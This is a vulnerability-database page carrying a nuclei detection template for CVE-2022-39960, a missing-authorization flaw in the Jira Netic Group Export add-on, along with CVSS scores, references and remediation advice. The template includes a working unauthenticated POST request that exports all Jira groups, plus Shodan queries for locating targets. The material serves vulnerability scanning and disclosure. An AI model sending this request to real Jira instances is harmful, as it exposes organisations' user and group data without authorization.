Lucene search
K

Jira Netic Group Export <1.0.3 - Missing Authorization

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 26 Views

Jira Netic Group Export<1.0.3 Missing Authorization CVE-2022-3996

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-39960
17 Sep 202218:15
attackerkb
Circl
CVE-2022-39960
17 Sep 202222:34
circl
CNNVD
Atlassian Jira 安全漏洞
17 Sep 202200:00
cnnvd
CVE
CVE-2022-39960
17 Sep 202217:49
cve
Cvelist
CVE-2022-39960
17 Sep 202217:49
cvelist
NVD
CVE-2022-39960
17 Sep 202218:15
nvd
OSV
CVE-2022-39960
17 Sep 202218:15
osv
Prion
Authorization
17 Sep 202218:15
prion
RedhatCVE
CVE-2022-39960
22 May 202523:23
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2022-39960
13 Nov 202300:00
vulncheck_kev
Rows per page
id: CVE-2022-39960

info:
  name: Jira Netic Group Export <1.0.3 - Missing Authorization
  author: For3stCo1d
  severity: medium
  description: |
    Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive data.
  remediation: |
    Upgrade to Jira Netic Group Export version 1.0.3 or later to fix the missing authorization issue.
  reference:
    - https://gist.github.com/CveCt0r/ca8c6e46f536e9ae69fc6061f132463e
    - https://marketplace.atlassian.com/apps/1222388/group-export-for-jira/version-history
    - https://nvd.nist.gov/vuln/detail/CVE-2022-39960
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Henry4E36/POCS
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-39960
    cwe-id: CWE-862
    epss-score: 0.2568
    epss-percentile: 0.97709
    cpe: cpe:2.3:a:netic:group_export:*:*:*:*:*:jira:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: netic
    product: group_export
    framework: jira
    shodan-query:
      - http.component:"Atlassian Jira"
      - http.component:"atlassian jira"
  tags: cve,cve2022,atlassian,jira,netic,unauth,vkev,vuln

http:
  - raw:
      - |
        POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        groupexport_searchstring=&groupexport_download=true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"jiraGroupObjects"'
          - '"groupName"'
        condition: and

      - type: word
        part: header
        words:
          - "attachment"
          - "jira-group-export"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207217d40b66ad8d39821e3a5000594713edcb41f548a43b577ea33cf34a02647b022100cfe3cb50d0e9513061d73ba4ff9285f818cf1fabfa0fab8ab065523ae2606e57:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.15.3
EPSS0.2568
26